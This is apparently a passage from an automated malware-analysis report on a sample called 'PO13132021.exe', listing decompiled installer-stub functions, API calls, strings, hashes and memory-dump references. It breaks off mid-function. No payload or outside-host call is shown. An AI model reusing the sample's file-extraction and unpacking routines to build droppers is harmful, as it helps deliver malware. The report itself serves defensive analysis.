CharNextA.USER32(?,"C:\Users\user\Desktop\PO13132021.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040656D
CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040657D

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406504
*?|<>/":, xrefs: 0040654B
"C:\Users\user\Desktop\PO13132021.exe" , xrefs: 0040653F

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\PO13132021.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2772397068
Opcode ID: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
Instruction ID: ed4a40943fe5e2665a2a55f9ea129fd4e03433fedea2fb13391fe05f183277a3
Opcode Fuzzy Hash: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
Instruction Fuzzy Hash: 5511E26180479139EB3216386C44B77BFD84B577A0F19007FE9C2722CAD67C5C62826D

Uniqueness

Uniqueness Score: -1.00%

Function 00404313, Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404313(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x00404325
0x004043db
0x00000000
0x004043db
0x00404336
0x0040433a
0x00000000
0x00404354
0x00404354
0x0040435d
0x00000000
0x00000000
0x0040435f
0x0040436b
0x0040436e
0x0040436e
0x00404374
0x0040437a
0x0040437a
0x00404386
0x0040438c
0x00404393
0x00404396
0x00404399
0x0040439b
0x0040439b
0x004043a3
0x004043a9
0x004043a9
0x004043b3
0x004043b8
0x004043bb
0x004043c0
0x004043c3
0x004043c3
0x004043d3
0x004043d3
0x00000000
0x004043d6

APIs

GetWindowLongA.USER32 ref: 00404330
GetSysColor.USER32(00000000), ref: 0040436E
SetTextColor.GDI32(?,00000000), ref: 0040437A
SetBkMode.GDI32(?,?), ref: 00404386
GetSysColor.USER32(?), ref: 00404399
SetBkColor.GDI32(?,?), ref: 004043A9
DeleteObject.GDI32(?), ref: 004043C3
CreateBrushIndirect.GDI32(?), ref: 004043CD

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction ID: 4ebf73092ad7484045a31fabae3cd442355fcbc25dfc518f848a7595e5b54366
Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction Fuzzy Hash: 592165716007049BCB309F68E948B5BBBF8AF41710B05892EED96E26E0D774E814CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040534F, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040534F(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423f24; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x424814;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004062BB(0, _t39, 0x420530, 0x420530, _a4);
					}
					_t26 = lstrlenA(0x420530);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423f08, 0x420530);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x420530;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x420530)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x420530, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00405355
0x00405361
0x00405364
0x0040536a
0x00405376
0x00405379
0x0040537c
0x00405382
0x00405382
0x00405388
0x00405390
0x00405393
0x004053b0
0x004053b4
0x004053bd
0x004053bd
0x004053c7
0x004053d0
0x004053dc
0x004053e3
0x004053e7
0x004053ea
0x004053fd
0x0040540b
0x0040540b
0x0040540f
0x00405411
0x00405414
0x00000000
0x00405414
0x00405395
0x0040539d
0x004053a5
0x004053ab
0x00000000
0x004053ab
0x004053a5
0x00405393
0x0040541e

APIs

lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053E3
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004053FD
SendMessageA.USER32(?,00001013,?,00000000), ref: 0040540B

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 1758c99315444ffa8de3e4a805647494e46ff97573bb8ff712cd1a67f4e860c0
Instruction ID: d7aab4fbb83e072b647ad5d9ecd44a72e262910ab30c50883f082c619406a612
Opcode Fuzzy Hash: 1758c99315444ffa8de3e4a805647494e46ff97573bb8ff712cd1a67f4e860c0
Instruction Fuzzy Hash: 54218171900118BBDB11AF95DD84ADEBFB9EF04354F14807AF944B6291C7788E918F98

Uniqueness

Uniqueness Score: -1.00%

Function 00402E52, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E52(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41f904;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x41f904 = 0;
					return _t15;
				}
				if( *0x41f904 != 0) {
					return E0040666D(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x424750) {
					if( *0x424748 == 0) {
						_t7 = CreateDialogParamA( *0x424740, 0x6f, 0, E00402DBA, 0);
						 *0x41f904 = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x424814 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402E36());
						return E0040534F(0,  &_v68);
					}
				}
				return _t6;
			}

0x00402e5e
0x00402e60
0x00402e67
0x00402e6a
0x00402e6a
0x00402e70
0x00000000
0x00402e70
0x00402e7e
0x00000000
0x00402e81
0x00402e88
0x00402e94
0x00402e9c
0x00402eda
0x00402ee3
0x00000000
0x00402ee8
0x00402ea5
0x00402eb6
0x00000000
0x00402ec4
0x00402ea5
0x00402ef0

APIs

DestroyWindow.USER32(?,00000000), ref: 00402E6A
GetTickCount.KERNEL32 ref: 00402E88
wsprintfA.USER32 ref: 00402EB6

Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
Part of subcall function 0040534F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053E3
Part of subcall function 0040534F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004053FD
Part of subcall function 0040534F: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040540B

CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402EDA
ShowWindow.USER32(00000000,00000005), ref: 00402EE8

Part of subcall function 00402E36: MulDiv.KERNEL32(?,00000064,?), ref: 00402E4B

Strings

... %d%%, xrefs: 00402EB0

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: bb3bd4b2b9508e1df3cc882d5ccfee83ca66d66d4289bc98e9bfc3421e5f8959
Instruction ID: 7a453c914e71352c87dd6fc4fa143b29ed4b83a6d55c3b122a6f25389f326a81
Opcode Fuzzy Hash: bb3bd4b2b9508e1df3cc882d5ccfee83ca66d66d4289bc98e9bfc3421e5f8959
Instruction Fuzzy Hash: 22018470582214E7CB61AB64EF0DAAF766CEB41745B14403BF801F21E0C7B95846CAEE

Uniqueness

Uniqueness Score: -1.00%

Function 00404BFF, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404BFF(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404c0d
0x00404c1a
0x00404c20
0x00404c5e
0x00404c5e
0x00404c6d
0x00404c74
0x00000000
0x00404c76
0x00404c22
0x00404c31
0x00404c39
0x00404c3c
0x00404c4e
0x00404c54
0x00404c5b
0x00000000
0x00404c5b
0x00000000

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C1A
GetMessagePos.USER32 ref: 00404C22
ScreenToClient.USER32 ref: 00404C3C
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404C4E
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404C74

Strings

f, xrefs: 00404C50

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction ID: 8affecd5b479f1171f5654815cc51d63bffccf6ae5a63c5c4c29235a80b14989
Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction Fuzzy Hash: 34015E71900219BBEB00DBA4DD85FFFBBBCAF55711F10012BBA50B61D0D7B4A9418BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405815, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405815(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				if(CreateDirectoryA(_a4,  &_v16) != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405820
0x00405824
0x00405827
0x0040582d
0x00405831
0x00405835
0x0040583d
0x00405844
0x0040584a
0x00405851
0x00405860
0x00405862
0x00000000
0x00405862
0x0040586c
0x00405873
0x00405889
0x00000000
0x00000000
0x00000000
0x0040588b
0x0040588f

APIs

CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405858
GetLastError.KERNEL32 ref: 0040586C
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405881
GetLastError.KERNEL32 ref: 0040588B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040583B
C:\Users\user\Desktop, xrefs: 00405815

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-3254906087
Opcode ID: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
Instruction ID: d6c2dc8a5c3265a730c97c9ba519fe28ff3708ad137b47d6a6340678ab851e8b
Opcode Fuzzy Hash: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
Instruction Fuzzy Hash: 60011A72D00219DADF10DFA1C944BEFBBB8EF04354F04803ADA45B6290E7789658CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00402DBA, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402E36();
					_t19 = "unpacking data: %d%%";
					if( *0x424754 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402dc7
0x00402dd5
0x00402ddb
0x00402ddb
0x00402de9
0x00402deb
0x00402df7
0x00402dfc
0x00402dfe
0x00402dfe
0x00402e09
0x00402e19
0x00402e2b
0x00402e2b
0x00402e33

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
wsprintfA.USER32 ref: 00402E09
SetWindowTextA.USER32(?,?), ref: 00402E19
SetDlgItemTextA.USER32 ref: 00402E2B

Strings

unpacking data: %d%%, xrefs: 00402DF7, 00402E07
verifying installer: %d%%, xrefs: 00402DFE

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 682236bfa9d44e469b32297ddf894a90f4f99da74b05dcaaf7480c0445501217
Instruction ID: 5924424b8475f9adf48b5715c1e1f77af8692632bd00ddb5f136e7bd4fbbb8aa
Opcode Fuzzy Hash: 682236bfa9d44e469b32297ddf894a90f4f99da74b05dcaaf7480c0445501217
Instruction Fuzzy Hash: 36F01D7154020DFBEF20AF60DE0ABAE3769EB54345F00803AFA16B51D0DBB899558B99

Uniqueness

Uniqueness Score: -1.00%

Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004027DF(void* __ebx, void* __eflags) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405C2D(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405D9C(_t50);
				_t26 = E00405DC1(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x424758;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403419(_t45);
						E00403403(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							E00403192(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405D7C( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405E68( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E00403192(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x004027df
0x004027e1
0x004027ed
0x004027f0
0x004027fa
0x004027fe
0x004027fe
0x00402804
0x00402811
0x00402819
0x0040281c
0x00402822
0x00402830
0x00402835
0x00402839
0x0040283c
0x00402845
0x00402851
0x00402855
0x00402858
0x00402862
0x00402887
0x00402869
0x0040286e
0x00402876
0x0040287c
0x00402881
0x00402881
0x0040288e
0x0040288e
0x0040289b
0x004028a1
0x004028b3
0x004028b3
0x004028b9
0x004028b9
0x004028c4
0x004028c5
0x004028c9
0x004028cd
0x004028d3
0x004028d3
0x004028da
0x004022dd
0x00402a5d
0x00402a69

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
GlobalFree.KERNEL32 ref: 0040288E
GlobalFree.KERNEL32 ref: 004028A1
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 9472795047facdfc58deb84b31b226fbb417f33134a7d8d5be020c0554978550
Instruction ID: d0efecf462ec4b8749248d5ce184abccdfd1d8ac98bc27b14fb78a8abc9ee6f4
Opcode Fuzzy Hash: 9472795047facdfc58deb84b31b226fbb417f33134a7d8d5be020c0554978550
Instruction Fuzzy Hash: A5217C72800128BBDB216FA5CE48D9E7E79EF09364F10823EF461762E1C67949418BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404AF5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404AF5(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E004062BB(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E004062BB(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E004062BB(_t41, _t47, 0x420d50, 0x420d50, _a8);
				wsprintfA(_t32 + lstrlenA(0x420d50), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423f18, _a4, 0x420d50);
			}

0x00404afb
0x00404b00
0x00404b08
0x00404b09
0x00404b16
0x00404b1e
0x00404b1f
0x00404b21
0x00404b23
0x00404b25
0x00404b28
0x00404b28
0x00404b2f
0x00404b35
0x00404b35
0x00404b3c
0x00404b43
0x00404b46
0x00404b49
0x00404b49
0x00404b4d
0x00404b5d
0x00404b5f
0x00404b62
0x00404b0b
0x00404b0b
0x00404b12
0x00404b12
0x00404b6a
0x00404b75
0x00404b8b
0x00404b9b
0x00404bb7

APIs

lstrlenA.KERNEL32(00420D50,00420D50,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A10,000000DF,00000000,00000400,?), ref: 00404B93
wsprintfA.USER32 ref: 00404B9B
SetDlgItemTextA.USER32 ref: 00404BAE

Strings

PB, xrefs: 00404B85
%u.%u%s%s, xrefs: 00404B7D

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$PB
API String ID: 3540041739-838025833
Opcode ID: 3412c4a7531a78c99129b4ba82c7811b22dc935ff741013f23db2bb1ff9efe52
Instruction ID: 5179c0f035392565bdab74c0efbe7b8420b5ea1509705373073e4f645d5961bf
Opcode Fuzzy Hash: 3412c4a7531a78c99129b4ba82c7811b22dc935ff741013f23db2bb1ff9efe52
Instruction Fuzzy Hash: 6011B773A0412437DB10656D9C45FAE329CDB85374F25023BFA26F31D1E978DC1282E9

Uniqueness

Uniqueness Score: -1.00%

Function 0040209D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0040209D(void* __ebx, void* __eflags) {
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x424818");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x4247e8 =  *0x4247e8 +  *(_t34 - 4);
					return 0;
				}
